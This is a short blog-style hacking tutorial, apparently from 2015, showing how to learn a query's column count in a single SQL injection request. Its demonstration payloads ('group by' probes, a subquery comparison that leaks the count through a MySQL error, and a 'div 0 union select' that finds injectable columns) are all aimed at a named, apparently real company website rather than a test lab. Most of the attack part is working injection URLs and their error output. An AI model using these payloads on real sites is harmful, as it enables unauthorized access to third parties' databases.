Kamis, 14 Mei 2015

[SQLI TRICK] find column count in one request [TUT]

up to now,we got the column count with group/order by.
like this

http://www.marinaplast.com/page.php?id=13 group by 6
error 1054
Quote:(Unknown column '6' in 'group statement')

http://www.marinaplast.com/page.php?id=13 group by 5
no error.
why its happening?
behind the url /page.php?id=13 there is a sql query

PHP Code:
SELECT * FROM pages WHERE id=13 

/** if you dont know what it means,its time to learn sql.
http://www.w3schools.com/sql/default.asp **/

the union columns represent the columns in the same table.
for example,if the query is like this

PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13 
so the union will be like
PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13 UNION SELECT 1,2,3,4,5 
because there is 5 columns in the table pages,wich wer'e in now.

now,after we understand,lets moving on.
we now the query behind our url is

PHP Code:
SELECT * FROM pages WHERE id=13 
but we dont know how much is * (it means select all the columns in the table).
so lets count *

http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)
we set a condition,and (the main query)=(select 1)
but we didnt write the columns!
so it gives result of the columns in the table.

http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)
error 1241
Quote:(Operand should contain 5 column(s))
it means 5 columns
http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5
columns 2&3 vuln.

hope you learned something

Author ::: BEnZI

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